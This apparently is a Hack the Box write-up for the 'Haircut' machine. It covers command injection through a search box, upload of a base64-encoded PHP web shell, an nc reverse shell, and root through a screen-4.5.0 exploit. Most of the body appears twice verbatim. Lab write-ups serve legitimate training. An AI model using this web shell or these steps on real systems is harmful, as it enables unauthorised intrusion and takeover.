Hello readers, today we are going to solve the Hack the box machine called Haircut.
OS : Linux
IP : 10.10.10.24
Enumeration:
Nmap scan output reveals two ports open; 80 and 22.
Exploring the IP on the web-browser only shows an image and the html source code in a dead end. Enumerating the website's using dirbuster reveals a couple of directories (/uploads and /exposed.php). /Uploads outputs a 403 error.
Upon browsing the exposed.php directory, it reaveals a search box on the web page. We set up tcpdump and ping ourselves through the search box and it gets to us and we see a curl error message. With curl we can upload or download a backdoor.
Exploitation:
Next we try to see if command injection works in burp or if burp can upload a test file. We intercept the exposed.php url and forward it via repeater and it works.
We then create a cmd.php file, start up python simple http server and upload the cmd.php (PD9waHAgZWNobyBzeXN0ZW0oJF9SRVFVRVNUWydmcmVzZWMnXSk7ID8+) file to the /uploads directory and see that it is uploaded.
Next we test for command injection and it works :)
We then set up a nc listener and use the cmd.php and a nc reverse shell to give us a shell. We get a connect back that's not obvious but upon running commands such as ls, we are able to see that the limited shell works.
We then use the python3 -c "import pty;pty.spawn('/bin/bash');" command and get a full shell.
Privilege Escalation:
To become root, we use LinEnum.sh to show us the available vulnerabilities. Additionally, we run the command: find / -perm -4000 2>/dev/null to see root owned files with setuid binaries that we can write to. We find one that has a version number (/usr/bin/screen-4.5.0) and searchsploit or exploit-db has a local privilege escalation exploit for it.
The 2 PoC states that we can get root but we have to compile them first;
I used the below one as it has compile instructions.
I compiled and used wget to transfer it over to our shell.
I followed the compile and instructions to get root and SUCESS!!! We are root :)
Exploring the IP on the web-browser only shows an image and the html source code in a dead end. Enumerating the website's using dirbuster reveals a couple of directories (/uploads and /exposed.php). /Uploads outputs a 403 error.
Upon browsing the exposed.php directory, it reaveals a search box on the web page. We set up tcpdump and ping ourselves through the search box and it gets to us and we see a curl error message. With curl we can upload or download a backdoor.
Exploitation:
Next we try to see if command injection works in burp or if burp can upload a test file. We intercept the exposed.php url and forward it via repeater and it works.
We then create a cmd.php file, start up python simple http server and upload the cmd.php (PD9waHAgZWNobyBzeXN0ZW0oJF9SRVFVRVNUWydmcmVzZWMnXSk7ID8+) file to the /uploads directory and see that it is uploaded.
Next we test for command injection and it works :)
We then set up a nc listener and use the cmd.php and a nc reverse shell to give us a shell. We get a connect back that's not obvious but upon running commands such as ls, we are able to see that the limited shell works.
We then use the python3 -c "import pty;pty.spawn('/bin/bash');" command and get a full shell.
Privilege Escalation:
To become root, we use LinEnum.sh to show us the available vulnerabilities. Additionally, we run the command: find / -perm -4000 2>/dev/null to see root owned files with setuid binaries that we can write to. We find one that has a version number (/usr/bin/screen-4.5.0) and searchsploit or exploit-db has a local privilege escalation exploit for it.
The 2 PoC states that we can get root but we have to compile them first;
I used the below one as it has compile instructions.
I compiled and used wget to transfer it over to our shell.
I followed the compile and instructions to get root and SUCESS!!! We are root :)
Comments
Post a Comment